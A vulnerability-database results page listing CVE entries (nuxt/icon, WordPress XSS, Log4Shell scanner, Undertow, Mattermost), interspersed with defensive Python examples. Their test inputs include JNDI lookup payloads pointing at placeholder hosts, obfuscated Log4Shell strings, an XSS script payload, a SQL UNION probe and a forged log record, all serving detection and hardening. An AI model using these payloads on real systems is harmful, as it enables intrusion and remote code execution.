
184 matches found

RedhatCVE
added 2025/02/05 2:26 a.m. · 6 views

CVE-2024-42352

Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. nuxt/icon provides an API to allow client-side icon lookup. This endpoint is at /api/_nuxt_icon/:name. The proxied request path is improperly parsed, allowing an attacker to change the scheme and...

CVSS 8.6 · AI score 8.3 · EPSS 0.00648
Exploits: 0 · References: 1
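The defect class behind the nuxt/icon entry, as an added example in Python that is not nuxt/icon's code: a proxy endpoint that joins the client-supplied icon name onto an upstream base URL with urljoin(), which silently accepts an absolute or protocol-relative URL as a replacement for the base, beside a resolver that re-checks scheme, host and path prefix after resolution. The upstream base URL and the probe paths are placeholders constructed for the example.

```python
"""Added example (not nuxt/icon's code): how a proxy that joins a
user-supplied path onto an upstream base URL lets the caller swap the scheme
and host, and a check that rejects such paths. The upstream base is a
placeholder assumption."""
from urllib.parse import urljoin, urlsplit

UPSTREAM_BASE = "https://icons.example/api/v1/"  # assumed upstream, placeholder


def resolve_naive(name: str) -> str:
    """Vulnerable pattern: join whatever the client sent onto the base.

    urljoin() treats an absolute URL (or a protocol-relative //host/ path) in
    `name` as a replacement for the base, so the proxy is steered to an
    attacker-chosen scheme and host.
    """
    return urljoin(UPSTREAM_BASE, name)


def resolve_checked(name: str) -> str:
    """Hardened pattern: resolve first, then verify the result is still under
    the expected scheme, host and path prefix before any request is made."""
    target = urljoin(UPSTREAM_BASE, name)
    base, tgt = urlsplit(UPSTREAM_BASE), urlsplit(target)
    if tgt.scheme != base.scheme or tgt.netloc != base.netloc:
        raise ValueError(f"refusing to proxy to another origin: {target!r}")
    if not tgt.path.startswith(base.path):
        raise ValueError(f"refusing to proxy outside {base.path!r}: {target!r}")
    return target


def is_allowed(name: str) -> bool:
    """True when resolve_checked() accepts the path, False when it rejects it."""
    try:
        resolve_checked(name)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for probe in ("mdi/home", "http://attacker.example/x", "//attacker.example/x", "../other"):
        print(f"{probe!r:32} naive -> {resolve_naive(probe)!r:40} allowed={is_allowed(probe)}")
```

The check is done on the parsed result rather than on the input string because the input can look harmless (a leading `//` has no scheme at all) while the resolved URL points elsewhere; comparing `urlsplit()` components also avoids the common prefix-check mistake of accepting `https://icons.example.attacker.example/`.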
OSV
added 2024/10/04 5:15 a.m. · 3 views

CVE-2024-9204

The Smart Custom 404 Error Page plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 11.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject...

CVSS 6.1 · AI score 5.9 · EPSS 0.00424
Exploits: 0 · References: 4
OSV
added 2024/09/12 6:15 a.m. · 3 views

CVE-2024-6018

The Music Request Manager WordPress plugin through 1.3 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers...

CVSS 6.1 · AI score 5.8 · EPSS 0.00307
Exploits: 1 · References: 1
Packet Storm
added 2024/09/01 12:00 a.m. · 503 views

Log4Shell HTTP Scanner

This module requires Metasploit: https://metasploit.com/download. Current source: https://github.com/rapid7/metasploit-framework. Module source excerpt: class MetasploitModule ... 'Log4Shell HTTP Scanner', 'Description' => %q{ Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, ...

CVSS 10 · AI score 10 · EPSS 0.99999
Exploits: 347
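The scanner above probes for CVE-2021-44228 by sending a JNDI lookup string; the defensive counterpart is finding such strings in your own logs. The following is an added example, not the Metasploit module's code: a detector that first resolves the nested Log4j lookups (${lower:...}, ${upper:...}, ${...:-default}) attackers wrap around the payload to defeat a literal "${jndi:" match, then flags the line. The access-log lines are constructed with TEST-NET addresses.

```python
"""Added example (not the Metasploit module): detect Log4Shell (CVE-2021-44228)
JNDI lookup probes in web-server logs, including the nested-lookup obfuscations
attackers use to evade naive "${jndi:" matching. The log lines are constructed."""
import re

# Log4j lookups commonly nested inside the payload to hide the literal "jndi":
#   ${lower:J} -> j     ${upper:j} -> J     ${env:NOPE:-j} / ${::-j} -> j
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.I)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(value: str) -> str:
    """Resolve the innermost nested lookups repeatedly until nothing changes,
    which recovers the literal characters the obfuscation was hiding."""
    prev = None
    while prev != value:
        prev = value
        value = _LOWER.sub(lambda m: m.group(1).lower(), value)
        value = _UPPER.sub(lambda m: m.group(1).upper(), value)
        value = _DEFAULT.sub(lambda m: m.group(1), value)
    return value


def is_log4shell_probe(value: str) -> bool:
    """True if the (de-obfuscated) value contains a JNDI lookup."""
    return _JNDI.search(normalize(value)) is not None


def scan_log(lines):
    """Return the 1-based numbers of lines that carry a JNDI lookup."""
    return [n for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


# Constructed access-log lines (TEST-NET addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.11 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.12 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://203.0.113.5/x}"',
    '203.0.113.13 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.5/y}"',
    '203.0.113.14 - - "GET /docs/jndi-lookup-notes HTTP/1.1" 200 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n in scan_log(SAMPLE_LOG):
        print(f"line {n}: {SAMPLE_LOG[n - 1]}")
```

Run it over real access logs one line at a time; the User-Agent, X-Forwarded-For and any other header the application logs are the usual carriers. The normalisation handles the three lookup forms shown and stops at a fixpoint, so deeper nesting of the same forms is also unwrapped.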
CNNVD
added 2024/08/01 12:00 a.m. · 3 views

SourceCodester Tracking Monitoring Management System SQL injection vulnerability

SourceCodester Tracking Monitoring Management System is a monitoring management system from SourceCodester Inc. A SQL injection vulnerability exists in SourceCodester Tracking Monitoring Management System version 1.0; it stems from the id parameter of the...

CVSS 9.8 · AI score 7 · EPSS 0.00544
Exploits: 1 · References: 5
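The injection pattern the entry above describes, an id parameter spliced into a query, as an added example in Python against an in-memory SQLite table (not the SourceCodester application's PHP). The schema and rows are constructed; the point is what each lookup returns for the same three inputs.

```python
"""Added example (not the SourceCodester application's PHP): an id parameter
concatenated into SQL text beside the parameterized form. The schema and rows
are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE trackings (id INTEGER PRIMARY KEY, owner TEXT, item TEXT)")
    conn.executemany(
        "INSERT INTO trackings VALUES (?, ?, ?)",
        [(1, "alice", "parcel A"), (2, "bob", "parcel B"), (3, "carol", "parcel C")],
    )
    return conn


def lookup_vulnerable(conn, id_param: str):
    """Vulnerable: the request parameter is pasted into the statement, so the
    WHERE clause is whatever the client wrote (tautology, UNION, ...)."""
    sql = f"SELECT id, owner, item FROM trackings WHERE id = {id_param}"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, id_param: str):
    """Hardened: validate the type, then bind the value; the statement's
    structure is fixed and the input can only ever be compared as a number."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, owner, item FROM trackings WHERE id = ?", (id_value,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    for param in ("2", "2 OR 1=1", "0 UNION SELECT 1, sqlite_version(), 'leaked'"):
        print(f"{param!r:48} vulnerable={len(lookup_vulnerable(db, param))} rows  "
              f"parameterized={len(lookup_parameterized(db, param))} rows")
```

The UNION probe is the one to remember when triaging: it is how an `id` injection turns from "see everyone's rows" into "read arbitrary tables", and it only works because the vulnerable form lets the client append a second SELECT.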
Positive Technologies
added 2024/07/13 12:00 a.m. · 3 views

PT-2024-37090 · WordPress · If-So Dynamic Content Personalization

Name of the Vulnerable Software and Affected Versions: If-So Dynamic Content Personalization WordPress plugin versions prior to 1.8.0.4. Description: The issue is related to Reflected Cross-Site Scripting in old web browsers due to the failure to escape the $_SERVER['REQUEST_URI'] parameter before...

CVSS 5.4 · AI score 6.5 · EPSS 0.00333
Exploits: 1 · References: 4
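CVE-2024-9204, CVE-2024-6018 and PT-2024-37090 above are the same defect: the request URI echoed into an HTML attribute without escaping. The following is an added example in Python (the affected plugins are PHP; this is not their code) showing the unescaped and escaped renderings, and why two of the advisories say "old web browsers": modern browsers percent-encode the quote and angle brackets in the path, so the raw payload only arrives from old browsers or non-browser clients, unless the application percent-decodes the path itself before output. The payload strings are constructed.

```python
"""Added example in Python (the plugins on this page are PHP): the request URI
echoed into an HTML attribute without escaping, beside the escaped form, and
why modern browsers rarely deliver the raw payload. Inputs are constructed."""
import html
from urllib.parse import unquote


def render_form_unescaped(request_uri: str) -> str:
    """Vulnerable pattern: raw request path inside an attribute
    (PHP equivalent: echo $_SERVER['REQUEST_URI'] into action="...")."""
    return f'<form method="post" action="{request_uri}">'


def render_form_escaped(request_uri: str) -> str:
    """Hardened: attribute-context escaping; quote=True also encodes " and ',
    so a quote in the path cannot terminate the attribute."""
    return f'<form method="post" action="{html.escape(request_uri, quote=True)}">'


def render_form_decoded(request_uri: str) -> str:
    """Also vulnerable: percent-decoding the path before output re-creates the
    raw characters a modern browser had encoded away."""
    return render_form_unescaped(unquote(request_uri))


def injects_script(markup: str) -> bool:
    """True if the rendered markup contains a <script> tag the template never
    had, i.e. the path broke out of the attribute."""
    return "<script" in markup.lower()


RAW_PAYLOAD = '/page/"><script>alert(1)</script>'                # as an old browser sends it
ENCODED_PAYLOAD = "/page/%22%3E%3Cscript%3Ealert(1)%3C/script%3E"  # as a modern browser sends it

if __name__ == "__main__":
    for label, fn in (("unescaped", render_form_unescaped),
                      ("escaped", render_form_escaped),
                      ("decoded", render_form_decoded)):
        print(f"{label:10} raw={injects_script(fn(RAW_PAYLOAD))!s:5} "
              f"encoded={injects_script(fn(ENCODED_PAYLOAD))}")
```

When testing such a finding, send the raw payload with a non-browser client (curl does not encode the path) rather than a current browser, and check separately whether the application decodes the URI before echoing it; in WordPress the attribute should go through esc_url() or esc_attr() rather than being echoed.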
Github Security Blog
added 2024/06/20 3:31 p.m. · 43 views

Undertow's url-encoded request path information can be broken on ajp-listener

A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processe...

CVSS 7.5 · AI score 7.5 · EPSS 0.01702
Exploits: 0 · References: 15 · Affected software: 1
OSV
added 2024/06/20 3:31 p.m. · 20 views

GHSA-9442-GM4V-R222 Undertow's url-encoded request path information can be broken on ajp-listener

A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processe...

CVSS 8.7 · AI score 7.5 · EPSS 0.01702
Exploits: 0 · References: 15
OSV
added 2024/06/20 3:15 p.m. · 13 views

CVE-2024-6162

A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processe...

CVSS 7.5 · AI score 7.5 · EPSS 0.01702
Exploits: 0 · References: 7
NVD
added 2024/06/20 3:15 p.m. · 21 views

CVE-2024-6162

A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processe...

CVSS 7.5 · EPSS 0.01702
Exploits: 0 · References: 7
CVE
added 2024/06/20 2:33 p.m. · 134 views

CVE-2024-6162

CVE-2024-6162 – Undertow URL path handling issue: A buffer reuse bug in Undertow's AJP listener can mishandle URL-encoded request paths under concurrent requests, causing path information to be mixed up. This may lead the server to access the wrong path, generating errors like 404 and potentiall...

CVSS 7.5 · AI score 7.6 · EPSS 0.01702
Exploits: 0 · References: 7
Cvelist
added 2024/06/20 2:33 p.m. · 64 views

CVE-2024-6162 Undertow: url-encoded request path information can be broken on ajp-listener

A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processe...

CVSS 7.5 · EPSS 0.01702
Exploits: 0 · References: 6
Vulnrichment
added 2024/06/20 2:33 p.m. · 44 views

CVE-2024-6162 Undertow: url-encoded request path information can be broken on ajp-listener

A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processe...

CVSS 7.5 · AI score 7.6 · EPSS 0.01702
Exploits: 0 · References: 6
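The CVE-2024-6162 entries above all describe one mechanism: a single decode buffer shared by every in-flight request on the listener. The following is an added example, not Undertow's code: a Python model of that defect in which two request decodes are driven in lock-step (a deterministic stand-in for thread interleaving, so the mix-up reproduces on every run), beside the per-request-buffer form that the description implies as the fix. The request paths are constructed.

```python
"""Added example (not Undertow's code): a model of the AJP listener bug, one
decode buffer shared by all in-flight requests, driven with a deterministic
interleaving so the mix-up reproduces every run, beside a per-request buffer.
Paths are constructed."""
from urllib.parse import unquote


class SharedBufferDecoder:
    """Models the defect: every request decodes into the same scratch buffer."""

    def __init__(self):
        self.buf = []

    def decode(self, raw_path: str):
        # Generator: one character per step, yielding between steps so another
        # request's decode can run in between, as concurrent requests would.
        self.buf.clear()
        for ch in raw_path:
            self.buf.append(ch)
            yield
        return unquote("".join(self.buf))


class PerRequestDecoder:
    """Fixed form: the buffer belongs to the request, so interleaving is harmless."""

    def decode(self, raw_path: str):
        buf = []
        for ch in raw_path:
            buf.append(ch)
            yield
        return unquote("".join(buf))


def decode_concurrently(decoder, raw_a: str, raw_b: str):
    """Drive both decodes in lock-step and return the path each request got."""
    gens = [decoder.decode(raw_a), decoder.decode(raw_b)]
    results = [None, None]
    while None in results:
        for i, gen in enumerate(gens):
            if results[i] is None:
                try:
                    next(gen)
                except StopIteration as done:
                    results[i] = done.value
    return results


if __name__ == "__main__":
    a, b = "/app/%41", "/admin/%42"
    print("shared buffer :", decode_concurrently(SharedBufferDecoder(), a, b))
    print("per request   :", decode_concurrently(PerRequestDecoder(), a, b))
```

With the shared buffer, request A ends up with characters from request B's path interleaved into its own, which is exactly the "wrong path, 404" symptom the CVE entry describes; the security relevance is that the mixed-up path is what authorisation and routing decisions are then made on. A real listener hits this non-deterministically under load, which is why such bugs surface as intermittent errors rather than in unit tests.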
OSV
added 2024/06/14 11:08 a.m. · 2 views

OESA-2024-1713 python-Flask-Cors security update

A Flask extension for handling Cross Origin Resource Sharing (CORS), making cross-origin AJAX possible. Security Fixes: corydolphin/flask-cors is vulnerable to log injection when the log level is set to debug. An attacker can inject fake log entries into the log file by sending a specially crafted...

CVSS 5.3 · AI score 7.2 · EPSS 0.00574
Exploits: 1 · References: 2
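What "inject fake log entries" means in practice, as an added example that is not flask-cors's code: a debug-level logger records a request value verbatim, a CR/LF inside that value starts a second line shaped like a record from another component, and escaping the line terminators before logging keeps one request on one line. It assumes the logged value is the request's Origin header (the entry's description is truncated before it says which value); the header value is constructed.

```python
"""Added example (not flask-cors's code): how a CR/LF in a logged request
value forges a second log record at debug level, and the escaping that keeps it
on one line. Assumes the logged value is the request's Origin header; the
header value is constructed."""
import io
import logging


def make_logger(name: str):
    """Debug-level logger writing to an in-memory stream so lines can be inspected."""
    stream = io.StringIO()
    logger = logging.getLogger(name)
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.DEBUG)
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter("%(levelname)s %(name)s: %(message)s"))
    logger.addHandler(handler)
    return logger, stream


def sanitize(value: str) -> str:
    """Neutralise line terminators so one request can only ever produce one record."""
    return value.replace("\r", "\\r").replace("\n", "\\n")


def log_origin(origin: str, escape: bool):
    """Log an Origin header value and return the resulting log lines."""
    logger, stream = make_logger("cors.demo")
    logger.debug("Request origin: %s", sanitize(origin) if escape else origin)
    return stream.getvalue().splitlines()


# Constructed attacker-controlled header: a real-looking origin followed by a
# newline and text shaped like a legitimate record from another logger.
FORGED_ORIGIN = "https://attacker.example\nINFO auth: login ok user=admin from=203.0.113.9"

if __name__ == "__main__":
    print(log_origin(FORGED_ORIGIN, escape=False))
    print(log_origin(FORGED_ORIGIN, escape=True))
```

The second line in the unescaped output carries no marker that it came from the CORS logger; anything that parses the log by line (a SIEM, an auditor, grep) attributes it to "auth". Escaping rather than stripping keeps the evidence of the attempt visible in the record.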
OSV
added 2024/06/05 3:10 p.m. · 18 views

GO-2024-2796 Mattermost fails to limit the size of a request path in github.com/mattermost/mattermost-server

Mattermost fails to limit the size of a request path in github.com/mattermost/mattermost-server...

CVSS 6.5 · AI score 3.5 · EPSS 0.00537
Exploits: 0 · References: 7
RedhatCVE
added 2024/04/26 11:47 a.m. · 32 views

CVE-2024-22091

A flaw was found in Mattermost, where it failed to limit the size of a request path that includes user inputs. This flaw allows an attacker to cause excessive resource consumption, possibly leading to a denial of service (DoS) via sending large request paths...

CVSS 3.1 · AI score 4.1 · EPSS 0.00537
Exploits: 0 · References: 4
Github Security Blog
added 2024/04/26 9:30 a.m. · 15 views

Mattermost fails to limit the size of a request path

Mattermost versions 8.1.x <= 8.1.10, 9.6.x <= 9.6.0, 9.5.x <= 9.5.2 and 8.1.x <= 8.1.11 fail to limit the size of a request path that includes user inputs, which allows an attacker to cause excessive resource consumption, possibly leading to a DoS via sending large request paths...

CVSS 6.5 · AI score 4 · EPSS 0.00537
Exploits: 0 · References: 7 · Affected software: 1
Cvelist
added 2024/04/26 8:24 a.m. · 16 views

CVE-2024-22091 Excessive resource consumption due to lack of request path size limits

Mattermost versions 8.1.x <= 8.1.10, 9.6.x <= 9.6.0, 9.5.x <= 9.5.2 and 8.1.x <= 8.1.11 fail to limit the size of a request path that includes user inputs, which allows an attacker to cause excessive resource consumption, possibly leading to a DoS via sending large request paths...

CVSS 3.1 · AI score 4.2 · EPSS 0.00537
Exploits: 0 · References: 1
CVE
added 2024/04/26 8:24 a.m. · 53 views

CVE-2024-22091

CVE-2024-22091 affects Mattermost servers where the path of requests containing user inputs is not length-limited. The root cause is an insufficient limit on the size of request paths, which can trigger excessive resource consumption and potentially cause a DoS. Affected versions include Mattermo...

CVSS 6.5 · AI score 6.7 · EPSS 0.00537
Exploits: 0 · References: 1 · Affected software: 1
Vulnrichment
added 2024/04/26 8:24 a.m. · 20 views

CVE-2024-22091 Excessive resource consumption due to lack of request path size limits

Mattermost versions 8.1.x <= 8.1.10, 9.6.x <= 9.6.0, 9.5.x <= 9.5.2 and 8.1.x <= 8.1.11 fail to limit the size of a request path that includes user inputs, which allows an attacker to cause excessive resource consumption, possibly leading to a DoS via sending large request paths...

CVSS 3.1 · AI score 6.8 · EPSS 0.00537
Exploits: 0 · References: 1
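The control the CVE-2024-22091 entries above say was missing, a bound on request path size, placed where it belongs: in front of the application, before routing, logging or any regex matching spends resources on the path. This is an added example in Python as a WSGI middleware, not Mattermost's Go code; the 2048-character limit and the echo application are assumptions, and the in-process client exists only so the block runs stand-alone.

```python
"""Added example (not Mattermost's Go code): a WSGI middleware that rejects
over-long request paths with 414 before routing, logging or regex matching
spend resources on them. The limit and the echo app are assumptions."""

MAX_PATH_CHARS = 2048  # assumed limit; size it to the longest legitimate route


def limit_path_length(app, max_chars: int = MAX_PATH_CHARS):
    """Wrap a WSGI app so requests whose path (plus query) exceeds max_chars
    never reach it. Under PEP 3333 PATH_INFO is latin-1 decoded, so one
    character is one byte of the wire path."""

    def wrapped(environ, start_response):
        path = environ.get("PATH_INFO", "")
        query = environ.get("QUERY_STRING", "")
        total = len(path) + (len(query) + 1 if query else 0)
        if total > max_chars:
            body = b"414 URI Too Long"
            start_response(
                "414 URI Too Long",
                [("Content-Type", "text/plain"), ("Content-Length", str(len(body)))],
            )
            return [body]
        return app(environ, start_response)

    return wrapped


def echo_app(environ, start_response):
    """Stand-in application that echoes the path it was asked for."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [environ.get("PATH_INFO", "").encode("latin-1")]


def get(app, path: str, query: str = ""):
    """Minimal in-process WSGI client: returns (status, body) for a GET."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        return lambda data: None

    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path, "QUERY_STRING": query}
    body = b"".join(app(environ, start_response))
    return captured["status"], body


if __name__ == "__main__":
    guarded = limit_path_length(echo_app)
    print(get(guarded, "/api/v4/users/me"))
    print(get(guarded, "/api/v4/users/" + "a" * 5000)[0])
```

A reverse proxy in front of the application usually enforces a similar bound on the whole request line (and should), but the application-level check is what protects internal callers and any deployment where the proxy limit is raised or absent; 414 is the status defined for exactly this refusal.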